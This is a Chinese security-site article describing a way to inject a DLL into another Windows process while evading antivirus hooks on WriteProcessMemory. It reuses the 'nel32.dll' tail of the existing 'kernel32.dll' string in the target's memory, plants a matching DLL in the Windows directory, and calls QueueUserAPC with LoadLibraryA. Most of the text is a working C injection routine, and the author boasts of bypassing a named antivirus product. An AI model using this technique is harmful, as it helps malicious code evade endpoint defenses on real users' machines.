黑基网 首页 学院 电脑技术 查看内容

绕过主动防御的代码注入方法一点思考

2008-10-25 10:27| 投稿: computer

摘要: 目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。  关于代码注入Ring...
目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。  关于代码注入Ring3层的方法主要有:  远程线程CreateRemoteThread  消息钩子SetWindowsHookEx  Ring3 APC QueueUserApc  修改线程上下文SetContextThread  其中第一种和第三种方法需要传入一个param,但是要求这个param必须在目标进程内存空间,之前的一些方法比较笨重,直接在目标进程VirtualAllocEx内存,然后把希望的参数内容写入这个内存,使用了WriteProcessMemory函数,而这个函数是被hook的,所以杀软可以很容易的拦截代码注入行为。  仔细想想,杀软的这种防御是很失败的!原因是为了要一个param,攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存,我在思考是否可以不用WriteProcessMemory函数呢?反正我的目的就是得到一个合理的param,并且这个param是在目标进程内存空间即可!  思考后,原来一切是这么容易啊,哈哈!乐了我半天~~~  举个例子:假设我是这样注入的:  QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;  我想让上面的param的内容是一个“xxx.dll”,就可以了,而且要求这个param是在目标进程内存空间  您想到了么?哈哈  答案:直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦!因为“kernel32.dll” 这样的字符串是一定存在的,那么为了和“kernel32.dll” 不一样,那就随便使用一下“nel32.dll”,或者“el32.dll”,都是可以的啊!最后在往windows目录下面撂进入一个nel32.dll,这样注入大部分杀软都是不能拦截到的!哈哈!  写了段程序,做了个试验,仅测试了下趋势,完美绕过!其实杀软稍后测试。。。  DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)  {  TIDLIST *pCurrentTid = pThreadIdList ;  const char szInjectModName[] = "nel32.dll";  DWORD dwLen = strlen(szInjectModName) ;  //////////////////////////////////////////////////////////////////////////  //不写目标进程的内存  //直接在目标进程中搜索出 nel32.dll 这样的字符串 并注入  //////////////////////////////////////////////////////////////////////////  int bufflen=30000;  char *buffer=(char *)malloc(sizeof(char)*bufflen);  DWORD dwNumberOfBytesRead;  DWORD defaultAddress;  //获得该进程的基址  HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;  if(!hSnapshot)  {  printf("CreateToolhelp32Snapshot error!\n");  return 0;  }  MODULEENTRY32 me = { sizeof(me) };  BOOL fOk =Module32First(hSnapshot,&me);  if(!fOk)  {  printf("Module32First error!\n");  return 0;  }  for (; fOk; fOk = Module32Next(hSnapshot,&me))  {  printf("%s process module name = %s\n",processName,me.szModule);  // 取得进程模块基址  if(stricmp(me.szModule,processName)==0)  {  defaultAddress=(DWORD)me.modBaseAddr;  printf("%s process module base = 0x%08X\n",processName,defaultAddress);  break;  }  }  //搜索  if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))  {  printf("ReadProcessMemory error!\n");  return 0;  }  for(int i=0;i<bufflen-dwLen;i++)  {  if(strnicmp(buffer+i,szInjectModName,dwLen)==0)  {  printf("found nel32.dll already!... %s\n",buffer+i);  while (pCurrentTid)  {  HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;  if (hThread != NULL)  {  //  // 注入DLL到指定进程  //  QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;  }  printf("TID:%d\n", pCurrentTid->dwTid) ;  pCurrentTid = pCurrentTid->pNext ;  }  break;  }  }  return 0 ;
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部